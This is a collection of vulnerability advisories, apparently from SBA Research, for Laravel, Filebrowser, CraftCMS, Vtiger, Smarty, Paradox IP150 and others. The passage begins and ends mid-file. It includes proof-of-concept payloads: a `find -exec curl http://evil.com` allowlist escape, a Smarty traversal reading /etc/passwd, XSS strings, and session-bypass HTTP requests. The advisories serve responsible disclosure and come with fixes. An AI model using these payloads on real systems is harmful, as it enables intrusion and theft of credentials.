95 | ``` 96 | 97 | As the `payload` value is not embedded with proper encoding, the browser 98 | interprets it as HTML, executes the injected JavaScript code and, therefore, 99 | opens an alert. 100 | 101 | ## Recommended Countermeasures ## 102 | 103 | If possible upgrade to the fixed version 11.36.0 or above. 104 | If you are unable to upgrade, ensure that the application does not run in 105 | debug-mode by setting `APP_DEBUG=false` in your configuration. 106 | 107 | ## Timeline ## 108 | 109 | * `2024-11-28` Identified the vulnerability in version 11.34.1 110 | * `2024-12-09` Initial contact attempt and disclosure of vulnerability to 111 | Laravel's security contact 112 | * `2024-12-13` Security patch was merged 113 | * `2024-12-14` Contacted Jeremy Angele (@angelej) who independently 114 | discovered the vulnerability and submitted the patch to fix it 115 | * `2024-12-17` Laravel project releases fixed version 11.36.0 116 | * `2025-02-05` Second attempt to contact Laravel's security contact 117 | * `2025-03-10` No reaction from Laravel's security contact to all previous 118 | contact attempts 119 | * `2025-03-10` SBA Research assigned CVE-2024-13918 120 | * `2025-03-10` Public disclosure 121 | 122 | ## References ## 123 | 124 | * Security Patch: 125 | 126 | ## Credits ## 127 | 128 | * Fabian Funder ([SBA Research](https://www.sba-research.org/)) 129 | * Philipp Adelsberger ([SBA Research](https://www.sba-research.org/)) 130 | -------------------------------------------------------------------------------- /2025/SBA-ADV-20250326-02_Filebrowser_Shell_Commands_Can_Spawn_Other_Commands/README.md: -------------------------------------------------------------------------------- 1 | # Filebrowser Shell Commands Can Spawn Other Commands # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | The *Command Execution* feature of Filebrowser only allows the execution of 6 | shell command which have been predefined on a user-specific allowlist. Many 7 | tools allow the execution of arbitrary different commands, rendering this 8 | limitation void. 9 | 10 | * **Identifier** : SBA-ADV-20250326-02 11 | * **Type of Vulnerability** : Shell Commands Can Spawn Other Commands 12 | * **Software/Product Name** : [Filebrowser](https://filebrowser.org/) 13 | * **Vendor** : [Filebrowser](https://github.com/filebrowser) 14 | * **Affected Versions** : <= 2.34.2 15 | * **Fixed in Version** : Not yet 16 | * **CVE ID** : CVE-2025-52903 17 | * **CVSS Vector** : CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H 18 | * **CVSS Base Score** : 8.0 (High) 19 | 20 | ## Vendor Description ## 21 | 22 | > filebrowser provides a file managing interface within a specified directory 23 | > and it can be used to upload, delete, preview, rename and edit your files. 24 | > It allows the creation of multiple users and each user can have its own 25 | > directory. It can be used as a standalone app. 26 | 27 | Source: 28 | 29 | ## Impact ## 30 | 31 | The concrete impact depends on the commands being granted to the attacker, 32 | but the large number of standard commands allowing the execution of 33 | subcommands makes it likely that every user having the `Execute commands` 34 | permissions can exploit this vulnerability. Everyone who can exploit it will 35 | have full code execution rights with the *uid* of the server process. 36 | 37 | ## Vulnerability Description ## 38 | 39 | Many Linux commands allow the execution of arbitrary different commands. For 40 | example, if a user is authorized to run only the `find` command and nothing 41 | else, this restriction can be circumvented by using the `-exec` flag. 42 | 43 | Some common commands having the ability to launch external commands and which 44 | are included in the official container image of Filebrowser are listed below. 45 | The website gives a comprehensive overview: 46 | 47 | * 48 | * 49 | * 50 | * 51 | * 52 | 53 | As a prerequisite, an attacker needs an account with the `Execute Commands` 54 | permission and some permitted commands. 55 | 56 | ## Proof of Concept ## 57 | 58 | The following screenshot demonstrates, how this can be used to issue a 59 | network call to an external server: 60 | 61 | ![Executing curl using find](images/execute_subcommand_with_find.png) 62 | 63 | ## Recommended Countermeasures ## 64 | 65 | Until this issue is fixed, we recommend to completely disable 66 | `Execute commands` for all accounts. Since the command execution is an 67 | inherently dangerous feature that is not used by all deployments, it should 68 | be possible to completely disable it in the application's configuration. 69 | 70 | The `prlimit` command can be used to prevent the execution of subcommands: 71 | 72 | ```bash 73 | $ find . -exec curl http://evil.com {} \; 74 | 75 | 76 | [...] 77 | 78 | $ prlimit --nproc=0 find . -exec curl http://evil.com {} \; 79 | find: cannot fork: Resource temporarily unavailable 80 | ``` 81 | 82 | It should be prepended to any command executed in the context of the 83 | application. `prlimit` can be used for containerized deployments as well as 84 | for bare-metal ones. 85 | 86 | WARNING: Note that this does prevent any unexpected behavior from the 87 | authorized command. For example, the `find` command can also delete files 88 | directly via its `-delete` flag. 89 | 90 | As a defense-in-depth measure, Filebrowser should provide an additional 91 | container image based on a *distroless* base image. 92 | 93 | ## Timeline ## 94 | 95 | * `2025-03-26` Identified the vulnerability in version 2.32.0 96 | * `2025-04-11` Contacted the project 97 | * `2025-04-18` Vulnerability disclosed to the project 98 | * `2025-06-25` Uploaded advisories to the project's GitHub repository 99 | * `2025-06-26` CVE ID assigned by GitHub 100 | * `2025-06-26` Advisory published by project as `GHSA-3q2w-42mv-cph4`; the 101 | issue itself won't be fixed, but command execution has been disabled by 102 | default in version 2.33.8 as a workaround; GitHub issue #5199 opened to 103 | track the fix 104 | 105 | ## References ## 106 | 107 | * prlimit: 108 | * "Distroless" Container Images: 109 | * GitHub Security Advisory: 110 | * GitHub Issue: 111 | 112 | ## Credits ## 113 | 114 | * Mathias Tausig ([SBA Research](https://www.sba-research.org/)) 115 | -------------------------------------------------------------------------------- /2024/SBA-ADV-20240202-02_CraftCMS_Plugin_Two-Factor_Authentication_TOTP_Valid_After_Use/README.md: -------------------------------------------------------------------------------- 1 | # CraftCMS Plugin - Two-Factor Authentication - TOTP Token Stays Valid After Use # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | The CraftCMS plugin Two-Factor Authentication through 3.3.3 allows reuse of 6 | TOTP tokens multiple times within the validity period. 7 | 8 | * **Identifier** : SBA-ADV-20240202-02 9 | * **Type of Vulnerability** : Improper Authentication 10 | * **Software/Product Name** : [Two-Factor Authentication](https://plugins.craftcms.com/two-factor-authentication?craft4) 11 | * **Vendor** : [Born05](https://www.born05.com/en/) 12 | * **Affected Versions** : <= 3.3.3 13 | * **Fixed in Version** : 3.3.4 14 | * **CVE ID** : CVE-2024-5658 15 | * **CVSS Vector** : CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N 16 | * **CVSS Base Score** : 4.8 (Medium) 17 | 18 | ## Vendor Description ## 19 | 20 | > Craft 4 plugin for two-factor or two-step login using Time Based OTP (TOTP, 21 | > like Google Authenticator). 22 | 23 | Source: 24 | 25 | ## Impact ## 26 | 27 | An attacker who is in possession of an TOTP token is able to establish an 28 | authenticated session. This requires that the attacker has knowledge of the 29 | victim's credentials. 30 | 31 | ## Vulnerability Description ## 32 | 33 | A TOTP token can be used multiple times to establish an authenticated session. 34 | RFC 6238 insists that an OTP must not be used more than once [1]. 35 | 36 | > The verifier MUST NOT accept the second attempt of the OTP after the 37 | > successful validation has been issued for the first OTP, which ensures 38 | > one-time only use of an OTP. 39 | 40 | The OWASP Application Security Verification Standard v4.0.3 (ASVS) reiterates 41 | this property with requirement 2.8.4 [2]. 42 | 43 | > Verify that time-based OTP can be used only once within the validity period. 44 | 45 | ## Proof of Concept ## 46 | 47 | Start the login process in two different environments e.g. in two different 48 | browsers. Enter the same TOTP in both environments while making sure that 49 | both submissions are made in the timespan where the TOTP is valid. Both 50 | environments should display the dashboard, signaling that the authentication 51 | process has been successful. 52 | 53 | The following request and response pairs show this behavior. The requests are 54 | made from different session (different `CraftSessionId` and `identity` 55 | cookie), but yield the same response. Therefore, the one-time use requirement 56 | of TOTPs has been shown to be violated. 57 | 58 | Request and response 1: 59 | 60 | ```http 61 | POST /index.php?p=admin%2Factions%2Ftwo-factor-authentication%2Fverify%2Flogin-process HTTP/1.1 62 | Host: example.org 63 | Cookie: dc06c534a0efbcbec00d44ec8b36ae7a_identity=7facf57ff[...]; CraftSessionId=3f8122e456[...] 64 | [...] 65 | 66 | {"authenticationCode":"317415"} 67 | 68 | 69 | HTTP/1.1 200 OK 70 | Date: Tue, 06 Feb 2024 11:09:23 GMT 71 | [...] 72 | 73 | { 74 | "returnUrl":"https://example.org/admin/dashboard", 75 | [...] 76 | } 77 | ``` 78 | 79 | Request and response 2: 80 | 81 | ```http 82 | POST /index.php?p=admin%2Factions%2Ftwo-factor-authentication%2Fverify%2Flogin-process HTTP/1.1 83 | Host: example.org 84 | Cookie: dc06c534a0efbcbec00d44ec8b36ae7a_identity=830fcd6c62[...]; CraftSessionId=3fbfbf904c[...] 85 | 86 | {"authenticationCode":"317415"} 87 | 88 | 89 | HTTP/1.1 200 OK 90 | Date: Tue, 06 Feb 2024 11:09:25 GMT 91 | [...] 92 | 93 | { 94 | "returnUrl":"https://example.org/admin/dashboard", 95 | [...] 96 | } 97 | ``` 98 | 99 | ## Recommended Countermeasures ## 100 | 101 | We recommend to update to version 3.3.4 or later, which applies the following 102 | countermeasure. 103 | 104 | We suggest that TOTPs should loose their validity after they have been used. 105 | In order to accomplish this a blocklist could be implemented where TOTPs used 106 | by a particular user are logged. This list must be periodically cleaned up to 107 | prevent collisions. 108 | 109 | ## Timeline ## 110 | 111 | * `2024-02-02`: Identified the vulnerability in version 3.3.2 112 | * `2024-02-04`: Contacted the Maintainer 113 | * `2024-02-05`: Vulnerability disclosed to the Maintainer 114 | * `2024-02-07`: Requested CVE from MITRE 115 | * `2024-02-08`: Maintainer released version 3.3.3 which is still vulnerable 116 | * `2024-02-08`: Maintainer fixed the vulnerability in version 3.3.4 117 | * `2024-06-04`: SBA Research becomes a CNA 118 | * `2024-06-05`: SBA Research assigned CVE-2024-5658 119 | * `2024-06-06`: Public disclosure 120 | 121 | ## References ## 122 | 123 | 1. RFC 6238. TOTP Time-Based One-Time Password Algorithm: 124 | 2. OWASP Application Security Verification Standard (ASVS) v4.0.3. Requirement 2.8.4 Verify that time-based OTP can be used only once within the validity period: 125 | 126 | ## Credits ## 127 | 128 | * Fabian Funder ([SBA Research](https://www.sba-research.org/)) 129 | * Jakob Pachmann ([SBA Research](https://www.sba-research.org/)) 130 | -------------------------------------------------------------------------------- /2022/SBA-ADV-20220120-01_MOKOSmart_MKGW1_Gateway_Improper_Session_Management/README.md: -------------------------------------------------------------------------------- 1 | # MOKOSmart MKGW1 Gateway Improper Session Management # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | MOKOSmart MKGW1 Gateway devices with firmware version 1.1.1 do 6 | not provide an adequate session management for the administrative web 7 | interface. This allows adjacent attackers with access to the management 8 | network to read and modify the configuration of the device. 9 | 10 | * **Identifier** : SBA-ADV-20220120-01 11 | * **Type of Vulnerability** : Improper Authentication 12 | * **Software/Product Name** : [MOKOSmart MKGW1 BLE Gateway](https://www.mokosmart.com/mokosmart-mkgw1-gateway-iot-cloud-platform/) 13 | * **Vendor** : [MOKO TECHNOLOGY LTD](https://www.mokosmart.com/) 14 | * **Affected Versions** : 1.1.1 15 | * **Fixed in Version** : Not yet 16 | * **CVE ID** : CVE-2023-51059 17 | * **CVSS Vector** : CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 18 | * **CVSS Base Score** : 8.0 (High) 19 | 20 | ## Vendor Description ## 21 | 22 | > * MKGW1 Bluetooth gateway is mainly used for the MOKO Bluetooth products. 23 | > * It is convenient for users to get the data of the MOKO series Beacon, 24 | > and advertising raw data of any Bluetooth device. 25 | > * It can upload the data to the server via MQTT (V3.1.1) or HTTP(S) 26 | > protocol. 27 | > * MKGW1 was developed with MediaTek® MT7688AN relying on OpenWrt system 28 | > and Nordic® nRF52 platform. 29 | > * MKGW1 can connect the standard MQTT Broker, Aws IOT, Azure IOT HUB, 30 | > Aliyun IOT. 31 | 32 | Source: 33 | 34 | ## Impact ## 35 | 36 | By exploiting the documented vulnerability, an attacker can gain 37 | administrative access to the device. For example, this can be misused by 38 | altering the configuration of the device or by reading out the configured 39 | network credentials and therefore getting a foothold in the victim's network. 40 | 41 | ## Vulnerability Description ## 42 | 43 | The gateway offers a web-based configuration interface that can be used to 44 | edit the configuration of the gateway. Username and password are requested 45 | to authenticate the administrator. After sending the correct credentials the 46 | device sets a global server-side state to "logged in" for 3600 seconds, 47 | rather than issuing a session ID. Now any device on the same network can 48 | access the configuration interface as administrator without any additional 49 | authentication and read and modify the configuration. 50 | 51 | ## Proof of Concept ## 52 | 53 | Login with the admin credentials on the web interface from a legitimate 54 | client: 55 | 56 | HTTP request: 57 | 58 | ```http 59 | POST /goform/login HTTP/1.1 60 | Host: 192.168.22.1 61 | Content-Type: application/json 62 | Content-Length: 39 63 | Origin: http://192.168.22.1 64 | Connection: close 65 | Referer: http://192.168.22.1/sign_in 66 | 67 | {"username":"Admin","password":"[redacted]"} 68 | ``` 69 | 70 | HTTP response: 71 | 72 | ```http 73 | HTTP/1.1 200 OK 74 | Content-type: application/json 75 | Pragma: no-cache 76 | Cache-Control: no-cache 77 | 78 | { "state": { "code": 2000, "msg": "ok" }, "data": { "activetime": "3600" } } 79 | ``` 80 | 81 | The response shown above does not contain any session identifier. 82 | On another client that can reach the web interface, an attacker can read out 83 | the configuration without any authentication: 84 | 85 | HTTP request: 86 | 87 | ```http 88 | GET /goform/get_wan HTTP/1.1 89 | Host: 192.168.22.1 90 | Connection: close 91 | ``` 92 | 93 | HTTP response: 94 | 95 | ```http 96 | HTTP/1.1 200 OK 97 | Content-type: application/json 98 | 99 | { "state": { "code": 2000, "msg": "ok" }, "data": { "wanmode": "WIFI", "wanssid": "[redacted]", "wanencrypt": "[redacted]", "wanpassword": "[redacted]", "proto": "dhcp", "ipaddr": "", "netmask": "", "gateway": "", "firdns": "", "secdns": "" } } 100 | ``` 101 | 102 | The above proof-of-concept shows that the MOKO gateway cannot distinguish 103 | between multiple sessions. Therefore, if a legitimate client is logged in, 104 | an attacker can read the configuration. Furthermore, an attacker can also 105 | modify the configuration by sending the appropriate `JSON` data to the 106 | respective `POST` endpoint. Changes to the network can trigger a reboot 107 | of the device. 108 | 109 | ## Recommended Countermeasures ## 110 | 111 | We are not aware of a vendor fix yet. Please contact the vendor. 112 | 113 | We recommend to implement a proper session management for the 114 | administrative web interface of the device. 115 | 116 | ## Timeline ## 117 | 118 | * `2022-01-20`: identification of vulnerability in version 1.1.1 119 | * `2022-01-27`: initial vendor contact 120 | * `2022-03-02`: disclosed vulnerability to vendor contact but received no reply 121 | * `2023-12-11`: request CVE from MITRE 122 | * `2023-12-12`: public disclosure 123 | * `2024-01-09`: MITRE assigned CVE-2023-51059 124 | 125 | ## References ## 126 | 127 | * [Moko Gateway Documentation](https://www.mokosmart.com/wp-content/uploads/2019/10/GS-gateway.pdf) 128 | 129 | ## Credits ## 130 | 131 | * Jakob Hagl ([SBA Research](https://www.sba-research.org/)) 132 | * David Lisa Gnedt ([SBA Research](https://www.sba-research.org/)) 133 | -------------------------------------------------------------------------------- /2022/SBA-ADV-20220328-01_Vtiger_CRM_Stored_Cross-Site_Scripting/README.md: -------------------------------------------------------------------------------- 1 | # Vtiger CRM Stored Cross-Site Scripting # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | Vtiger CRM 7.4.0 or below is prone to a stored cross-site scripting 6 | vulnerability in the email templates module due to insufficient sanitizing. 7 | 8 | * **Identifier** : SBA-ADV-20220328-01 9 | * **Type of Vulnerability** : Cross Site Scripting 10 | * **Software/Product Name** : [Vtiger CRM](https://code.vtiger.com/vtiger/vtigercrm) 11 | * **Vendor** : [Vtiger](https://www.vtiger.com/) 12 | * **Affected Versions** : <= 7.4.0 13 | * **Fixed in Version** : Not yet 14 | * **CVE ID** : CVE-2022-38335 15 | * **CVSS Vector** : CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N 16 | * **CVSS Base Score** : 7.6 (High) 17 | 18 | ## Vendor Description ## 19 | 20 | > Vtiger is a PHP based web application that enables businesses to increase 21 | > sales wins, marketing ROI, and support satisfaction by providing tools for 22 | > employees and management work more effectively, capture more data, and 23 | > derive new actionable insights from across the customer lifecycle. 24 | 25 | Source: 26 | 27 | ## Impact ## 28 | 29 | An authenticated attacker with the "Email Templates"-module privilege is able 30 | to insert JavaScript into email templates, which is triggered when a victim 31 | views the template. 32 | In the worst case, the victim's session could be hijacked and the attacker is 33 | able to perform actions in the victim's context. 34 | This could lead to privilege escalation if the victim is more privileged than 35 | the attacker (for example an admin). 36 | 37 | ## Vulnerability Description ## 38 | 39 | The following code snippet (`./modules/Emails/models/Mailer.php`) shows the 40 | function which should ensure that JavaScript is removed from the user input: 41 | 42 | ```php 43 | [...] 44 | public static function getProcessedContent($content) { 45 | // remove script tags from whole html content 46 | $processedContent = preg_replace('#(.*?)#is', '', $content); 47 | $processedContent = purifyHtmlEventAttributes($processedContent,TRUE); 48 | return $processedContent; 49 | } 50 | [...] 51 | ``` 52 | 53 | However, the regex `#(.*?)#is` is insufficient for 54 | sanitizing JavaScript. 55 | 56 | ## Proof of Concept ## 57 | 58 | If the attacker inserts the payload `a` 69 | * Description: `test_aiosp_desc&<>"'; pt:%post_title% wp_title:%wp_title% bd:%blog_description% sd:%site_description% bt: %blog_title% st: %site_title% desc:%description%` 70 | 71 | When the post is saved and accessed later the JavaScript alert-popup will be shown. 72 | The resulting HTML page will contain the following code (shortened for readability): 73 | 74 | ```html 75 | [...] 76 | test_aiosp_title&<>"';<script src='data:text/javascript,alert(1)'></script> | XXXXXXX 77 | 78 | 79 | wp_title:test_aiosp bd: sd: bt: XXXXXXX st: XXXXXXX desc:%description%" /> 80 | [...] 81 | ``` 82 | 83 | ## Recommended Countermeasures ## 84 | 85 | We recommend to properly escape the output by applying the encoding functions provided by WordPress, 86 | like the `esc_*`- or `wp_kses_*`-[functions][1] after all placeholders were substituted. 87 | 88 | [1]: https://developer.wordpress.org/themes/theme-security/data-sanitization-escaping/#escaping-securing-output 89 | 90 | ## Timeline ## 91 | 92 | * `2019-09-09` Identified the vulnerability 93 | * `2019-09-10` Contacted vendor 94 | * `2019-09-10` Response by vendor about disclosure contact 95 | * `2019-09-10` Vulnerability disclosed to vendor 96 | * `2019-09-10` Vulnerability verified by vendor 97 | * `2019-09-10` Vulnerability fixed by vendor, public disclosure coordinated 98 | * `2019-09-20` CVE assigned 99 | * `2019-10-16` Public disclosure 100 | 101 | ## References ## 102 | 103 | * 104 | * 105 | * 106 | * 107 | 108 | ## Credits ## 109 | 110 | * Tobias Fink ([SBA Research](https://www.sba-research.org/)) 111 | -------------------------------------------------------------------------------- /2025/SBA-ADV-20250326-01_Filebrowser_Command_Execution_Not_Limited_To_Scope/README.md: -------------------------------------------------------------------------------- 1 | # Filebrowser Command Execution not Limited to Scope # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | In the web application, all users have a *scope* assigned, and they only have 6 | access to the files within that *scope*. The *Command Execution* feature of 7 | Filebrowser allows the execution of shell commands which are not restricted 8 | to the scope, potentially giving an attacker read and write access to all 9 | files managed by the server. 10 | 11 | * **Identifier** : SBA-ADV-20250326-01 12 | * **Type of Vulnerability** : Command Execution not Limited to Scope 13 | * **Software/Product Name** : [Filebrowser](https://filebrowser.org/) 14 | * **Vendor** : [Filebrowser](https://github.com/filebrowser) 15 | * **Affected Versions** : <= 2.34.2 16 | * **Fixed in Version** : Not yet 17 | * **CVE ID** : CVE-2025-52904 18 | * **CVSS Vector** : CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H 19 | * **CVSS Base Score** : 8.0 (High) 20 | 21 | ## Vendor Description ## 22 | 23 | > filebrowser provides a file managing interface within a specified directory 24 | > and it can be used to upload, delete, preview, rename and edit your files. 25 | > It allows the creation of multiple users and each user can have its own 26 | > directory. It can be used as a standalone app. 27 | 28 | Source: 29 | 30 | ## Impact ## 31 | 32 | Shell commands are executed with the *uid* of the server process without any 33 | further restrictions. This means, that they will have access to at least 34 | 35 | * all files managed by the application from all *scopes*, even those the user 36 | does not have access to in the GUI. 37 | * the Filebrowser database file containing the password hashes of all accounts. 38 | 39 | The concrete impact depends on the commands being granted to the attacker, 40 | but due to other vulnerabilities identified ("Bypass Command Execution 41 | Allowlist", "Shell Commands Can Spawn Other Commands", "Insecure File 42 | Permissions") it is likely, that full read- and write-access will exist. 43 | 44 | Read access to the database means, that the attacker is capable of extracting 45 | all user password hashes. This enables an offline dictionary attack on the 46 | passwords of all accounts, though the choice of the password hash function 47 | (*bcrypt* with a complexity of 10) gives a strong protection against such 48 | attacks. Write access to the database means that attackers are capable of 49 | changing a user's password hash, allowing them to impersonate any user 50 | account, including an administrator. 51 | 52 | ## Vulnerability Description ## 53 | 54 | Shell commands executed by a user are created as a simple subprocess of the 55 | application without any further restrictions. That means, that they have full 56 | access to files accessible by the application. The *scope* that is assigned 57 | to every account is not considered. 58 | 59 | As a prerequisite, an attacker needs an account with the `Execute Commands` 60 | permission and some permitted commands. 61 | 62 | ## Proof of Concept ## 63 | 64 | Any exploit highly depends on the commands granted to the attacker. The 65 | following screenshot shows, how all password hashes can be extracted using 66 | only the `grep` command: 67 | 68 | ![Reading the password hashes using the "grep" command](images/commandexecution_readpasswordhashes.png) 69 | 70 | ## Recommended Countermeasures ## 71 | 72 | Until this issue is fixed, we recommend to completely disable 73 | `Execute commands` for all accounts. Since the command execution is an 74 | inherently dangerous feature that is not used by all deployments, it should 75 | be possible to completely disable it in the application's configuration. As a 76 | defense-in-depth measure, organizations not requiring command execution 77 | should operate the Filebrowser from a *distroless* container image. 78 | 79 | There are two approaches to fixing this issue: 80 | 81 | 1. Limiting the process when it is started e.g., by using *user namespaces* 82 | with a tool like *Bubblewrap*. If this path is chosen, it is important to 83 | use a method that works both on a bare-metal server and within an 84 | unprivileged container. 85 | 2. Re-architecting the command execution feature so that file in the various 86 | *scopes* have a distinct *uid* as an owner and all shell command are 87 | executed under the *uid* of the user's *scope*. 88 | 89 | ## Timeline ## 90 | 91 | * `2025-03-26` Identified the vulnerability in version 2.32.0 92 | * `2025-04-11` Contacted the project 93 | * `2025-04-18` Vulnerability disclosed to the project 94 | * `2025-06-25` Uploaded advisories to the project's GitHub repository 95 | * `2025-06-26` CVE ID assigned by GitHub 96 | * `2025-06-26` Advisory published by project as `GHSA-hc8f-m8g5-8362`; the 97 | issue itself won't be fixed, but command execution has been disabled by 98 | default in version 2.33.8 as a workaround; GitHub issue #5199 opened to 99 | track the fix 100 | 101 | ## References ## 102 | 103 | * Sandboxing Applications with Bubblewrap: Securing a Basic Shell: 104 | * "Distroless" Container Images: 105 | * GitHub Security Advisory: 106 | * GitHub Issue: 107 | 108 | ## Credits ## 109 | 110 | * Mathias Tausig ([SBA Research](https://www.sba-research.org/)) 111 | -------------------------------------------------------------------------------- /2018/SBA-ADV-20180420-01_Smarty_Path_Traversal/README.md: -------------------------------------------------------------------------------- 1 | # Smarty Trusted-Directory Bypass via Path Traversal # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | Smarty 3.1.32 or below is prone to a path traversal vulnerability due 6 | to insufficient sanitization of code in Smarty templates. This allows 7 | attackers controlling the Smarty template to bypass the trusted 8 | directory security restriction and read arbitrary files. 9 | 10 | * **Identifier** : SBA-ADV-20180420-01 11 | * **Type of Vulnerability** : Path Traversal 12 | * **Software/Product Name** : [Smarty](https://www.smarty.net/) 13 | * **Vendor** : Smarty 14 | * **Affected Versions** : 3.1.32 and probably prior 15 | * **Fixed in Version** : 3.1.33 16 | * **CVE ID** : CVE-2018-13982 17 | * **CVSSv3 Vector** : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N 18 | * **CVSSv3 Base Score** : 8.6 (High) 19 | 20 | ## Vendor Description ## 21 | 22 | > Smarty is a template engine for PHP, facilitating the separation of 23 | > presentation (HTML/CSS) from application logic. This implies that PHP 24 | > code is application logic, and is separated from the presentation. 25 | 26 | Source: 27 | 28 | ## Impact ## 29 | 30 | An attacker controlling the executed template code can read arbitrary 31 | files accessible by the webserver by exploiting the vulnerability 32 | documented in this advisory. Sensitive data such as database credentials 33 | might get exposed through this attack. 34 | 35 | We recommend upgrading to version 3.1.33 or newer. 36 | 37 | ## Vulnerability Description ## 38 | 39 | Smarty allows restricting which paths are accessible paths during 40 | template evaluation. This feature is implemented in the 41 | `Smarty_Security` class and is enabled via the method `enableSecurity`. 42 | However, the trusted directory check implemented in the method 43 | `isTrustedResourceDir` of the `Smarty_Security` class is vulnerable to 44 | path traversal. 45 | 46 | The method `isTrustedResourceDir` first builds a list of allowed 47 | directories in `$filepath` and then relies on the `_checkDir` method 48 | to check if the requested resource dir is trusted. In version 0.3.31 49 | neither `isTrustedResourceDir` nor `_checkDir` avoid path traversal: 50 | 51 | ```php 52 | public function isTrustedResourceDir($filepath, $isConfig = null) 53 | { 54 | [...] 55 | $this->_resource_dir = $this->_checkDir($filepath, $this->_resource_dir); 56 | return true; 57 | } 58 | 59 | private function _checkDir($filepath, $dirs) 60 | { 61 | $directory = dirname($filepath) . DIRECTORY_SEPARATOR; 62 | $_directory = array(); 63 | while (true) { 64 | // remember the directory to add it to _resource_dir in case we're successful 65 | $_directory[ $directory ] = true; 66 | // test if the directory is trusted 67 | if (isset($dirs[ $directory ])) { 68 | // merge sub directories of current $directory into _resource_dir to speed up subsequent lookup 69 | $dirs = array_merge($dirs, $_directory); 70 | return $dirs; 71 | } 72 | // abort if we've reached root 73 | if (!preg_match('#[\\\/][^\\\/]+[\\\/]$#', $directory)) { 74 | break; 75 | } 76 | // bubble up one level 77 | $directory = preg_replace('#[\\\/][^\\\/]+[\\\/]$#', DIRECTORY_SEPARATOR, $directory); 78 | } 79 | // give up 80 | throw new SmartyException("directory '{$filepath}' not allowed by security setting"); 81 | } 82 | ``` 83 | 84 | In version 0.3.32 `_checkDir` calls `_realpath` before checking if the 85 | requested resource is trusted. However, the custom realpath method is 86 | broken and allows path traversal at least on Unix systems. 87 | 88 | For example, the fetch tag uses the `isTrustedResourceDir` method to 89 | check if a user-specified path is allowed to read. 90 | 91 | ## Proof-of-Concept ## 92 | 93 | An attacker can exploit this vulnerability by using the fetch tag: 94 | 95 | ```php 96 | {fetch file="/var/www/templates/../../../../../etc/passwd"} 97 | ``` 98 | 99 | Full example: 100 | 101 | ```php 102 | enableSecurity(); 107 | // Fails 108 | //$smarty->display('eval:{fetch file="/etc/passwd"}'); 109 | // Works 110 | $smarty->display('eval:{fetch file="'.addslashes(getcwd()).'/templates/../../../../../etc/passwd"}'); 111 | ``` 112 | 113 | ## Timeline ## 114 | 115 | * `2018-04-20`: identification of vulnerability in version 3.1.31 116 | * `2018-04-23`: initial vendor contact 117 | * `2018-04-23`: disclosed vulnerability to vendor 118 | * `2018-04-24`: vendor acknowledged vulnerability and released version 3.1.32 119 | * `2018-04-25`: notified vendor about incomplete fix 120 | * `2018-04-26`: vendor fixed vulnerability 121 | * `2018-07-10`: request CVE from MITRE 122 | * `2018-07-11`: MITRE assigned CVE-2018-13982 123 | * `2018-09-12`: vendor released fix in version 3.1.33 124 | * `2018-09-17`: public disclosure 125 | 126 | ## References ## 127 | 128 | * Changelog: 129 | * Patches: 130 | * 131 | * 132 | * 133 | * 134 | 135 | ## Credits ## 136 | 137 | * David Gnedt ([SBA Research](https://www.sba-research.org/)) 138 | * Thomas Konrad ([SBA Research](https://www.sba-research.org/)) 139 | -------------------------------------------------------------------------------- /2024/SBA-ADV-20240321-01_Paradox_Cross_Site_Request_Forgery/README.md: -------------------------------------------------------------------------------- 1 | # Paradox IP150 Internet Module Cross-Site Request Forgery # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | The Paradox IP150 Internet Module in version 1.40.00 is vulnerable to 6 | Cross-Site Request Forgery (CSRF) attacks due to 7 | a lack of countermeasures and the use of the HTTP method `GET` to introduce 8 | changes in the system. 9 | 10 | * **Identifier** : SBA-ADV-20240321-01 11 | * **Type of Vulnerability** : Cross-Site Request Forgery (CSRF) 12 | * **Software/Product Name** : [IP150 Internet Module](https://www.paradox.com/Products/default.asp?CATID=3&SUBCATID=38&PRD=563) 13 | * **Vendor** : [Paradox Security Systems (Bahamas) Ltd.](https://www.paradox.com/) 14 | * **Affected Versions** : 1.40.00 (possibly others too) 15 | * **Fixed in Version** : Not yet 16 | * **CVE ID** : CVE-2024-5676 17 | * **CVSS Vector** : CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:H 18 | * **CVSS Base Score** : 6.8 (Medium) 19 | 20 | ## Vendor Description ## 21 | 22 | > IP150 23 | > Internet Module 24 | > Supports SWAN Server 25 | > 26 | > Features 27 | > 28 | > * Controls and monitors a control panel through an IP network (LAN / WAN / Internet) 29 | > * Reports control panel events via IP to the Paradox IPR512 GPRS / IP Monitoring Receiver and / or IPRS-7 GPRS / IP PC Receiver Software 30 | > * Two I/Os on board; controlled via the web interface, triggering an email 31 | > * Sends notification and alarm system events via email 32 | > * Arm / Disarm individual partitions via Insite GOLD app 33 | > * Connects to Swan for easy installation (no port forwarding) 34 | > * Enables Insite GOLD, or BabyWare to access your system through the Internet 35 | > * Push notification to Insite GOLD app 36 | > * HTTPS support for improving security (HyperText Transfer Protocol Secure; a widely used communications protocol for secure communication over a computer network) 37 | > * Very low bandwidth consumption 38 | > * Easy installation; built-in clip for mounting in a metal box 39 | > * Supported language: English 40 | > * Compatible with EVO Series, Spectra SP Series, MG5000, MG5050 and MG5075 41 | 42 | Source: 43 | 44 | ## Impact ## 45 | 46 | An attacker can coerce an administrator into clicking a link, which issues 47 | a HTTP request that changes the state of the system. 48 | Depending on the configuration, meaning which downstream component is 49 | controlled by the affected component, the impact will be different. 50 | As an example the *IP150 Internet Module* might control an alarm unit. 51 | Thus an attacker can deactivate the alarm by performing a CSRF attack. 52 | 53 | ## Vulnerability Description ## 54 | 55 | The server cannot verify whether a request was sent intentionally. This 56 | makes it possible for an attacker to trick a client into making 57 | unintentional requests to the web server which will be treated as an 58 | authentic request. In combination with a social engineering attack, 59 | this allows an attacker to perform server-side actions as the victim. 60 | 61 | In addition, the functionality of activation and deactivation of the alarm 62 